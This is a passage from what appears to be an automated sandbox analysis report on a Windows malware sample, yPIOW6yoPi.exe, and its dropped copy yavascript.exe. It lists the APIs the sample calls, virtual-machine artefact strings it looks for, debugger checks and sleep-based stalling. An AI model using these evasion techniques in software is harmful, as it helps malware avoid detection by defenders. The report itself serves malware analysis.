            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_0040E54F Sleep,ExitProcess,0_2_0040E54F
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_020FE7B6 Sleep,ExitProcess,0_2_020FE7B6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 17_2_0040E54F Sleep,ExitProcess,17_2_0040E54F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 17_2_0075E7B6 Sleep,ExitProcess,17_2_0075E7B6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 20_2_0040E54F Sleep,ExitProcess,20_2_0040E54F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 20_2_0213E7B6 Sleep,ExitProcess,20_2_0213E7B6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 38_2_0040E54F Sleep,ExitProcess,38_2_0040E54F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 38_2_0218E7B6 Sleep,ExitProcess,38_2_0218E7B6
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_004198C2
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_02109B29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_004198C2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_00769B29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,20_2_004198C2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,20_2_02149B29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,38_2_004198C2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,38_2_02199B29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Window / User API: threadDelayed 9741
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Evaded block: after key decision graph_0-88307
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Evaded block: after key decision graph_0-88281
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe API coverage: 3.6 %
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe API coverage: 6.3 %
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe API coverage: 3.4 %
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe API coverage: 3.4 %
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe TID: 4876 Thread sleep count: 252 > 30
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe TID: 4876 Thread sleep time: -756000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe TID: 4876 Thread sleep count: 9741 > 30
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe TID: 4876 Thread sleep time: -29223000s >= -30000s
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040B335
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0041B42F
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040B53A
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_0044D5E9 FindFirstFileExA,0_2_0044D5E9
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,0_2_004089A9
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_00406AC2 FindFirstFileW,FindNextFileW,0_2_00406AC2
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_00407A8C
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00418C69
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,0_2_00408DA7
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_020F900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_020F900E
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_0210B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0210B696
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_020FB59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_020FB59C
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_0213D850 FindFirstFileExA,0_2_0213D850
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_02108ED0 FindFirstFileW,0_2_02108ED0
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_020F7CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_020F7CF3
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_020F6D29 FindFirstFileW,FindNextFileW,0_2_020F6D29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 17_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 17_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,17_2_0041B42F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 17_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040B53A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 17_2_0044D5E9 FindFirstFileExA,17_2_0044D5E9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 17_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,17_2_004089A9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00406AC2 FindFirstFileW,FindNextFileW,17_2_00406AC2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,17_2_00407A8C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00418C69
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,17_2_00408DA7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0075900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0075900E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0075B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0075B59C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0076B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,17_2_0076B696
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0079D850 FindFirstFileExA,17_2_0079D850
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00757CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,17_2_00757CF3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00756D29 FindFirstFileW,FindNextFileW,17_2_00756D29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00768ED0 FindFirstFileW,17_2_00768ED0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,20_2_0041B42F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,20_2_0040B53A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0044D5E9 FindFirstFileExA,20_2_0044D5E9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,20_2_004089A9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00406AC2 FindFirstFileW,FindNextFileW,20_2_00406AC2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,20_2_00407A8C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,20_2_00418C69
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,20_2_00408DA7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0213900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_0213900E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0214B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,20_2_0214B696
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0213B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0213B59C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0217D850 FindFirstFileExA,20_2_0217D850
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02148ED0 FindFirstFileW,20_2_02148ED0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02137CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,20_2_02137CF3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02136D29 FindFirstFileW,FindNextFileW,20_2_02136D29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,38_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,38_2_0041B42F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,38_2_0040B53A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0044D5E9 FindFirstFileExA,38_2_0044D5E9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,38_2_004089A9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00406AC2 FindFirstFileW,FindNextFileW,38_2_00406AC2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,38_2_00407A8C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,38_2_00418C69
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,38_2_00408DA7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0218900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,38_2_0218900E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0219B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,38_2_0219B696
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0218B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,38_2_0218B59C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021CD850 FindFirstFileExA,38_2_021CD850
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02198ED0 FindFirstFileW,38_2_02198ED0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02187CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,38_2_02187CF3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02186D29 FindFirstFileW,FindNextFileW,38_2_02186D29
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00406F06
            Source: Amcache.hve.4.dr | Binary or memory string: VMware
            Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual USB Mouse
            Source: yavascript.exe, 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWxt
            Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin
            Source: Amcache.hve.4.dr | Binary or memory string: VMware, Inc.
            Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.4.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.4.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.4.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.4.dr | Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
            Source: yavascript.exe, 00000011.00000003.2391005348.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625362582.00000000008D1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%
            Source: yPIOW6yoPi.exe, 00000000.00000002.2295191627.00000000005BC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y!
            Source: yavascript.exe, 00000011.00000003.2391005348.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625362582.00000000008D1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: Amcache.hve.4.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.4.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.4.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.4.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.4.dr | Binary or memory string: vmci.sys
            Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.4.dr | Binary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.4.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1
            Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.4.dr | Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.4.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.4.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.4.dr | Binary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.4.dr | Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.4.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.4.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | API call chain: ExitProcess graph end node graph_17-88579
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | API call chain: ExitProcess graph end node graph_17-87753
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_00442554 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_00530083 push dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_021327BB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_020F092B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_020F0D90 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_00442554 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_005F0083 push dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_007927BB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_0075092B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_00750D90 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_00442554 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_00600083 push dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_021727BB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_0213092B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_02130D90 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 38_2_00442554 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 38_2_020E0083 push dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 38_2_021C27BB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 38_2_0218092B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 38_2_02180D90 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_0044E92E GetProcessHeap
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_00433CD7 SetUnhandledExceptionFilter
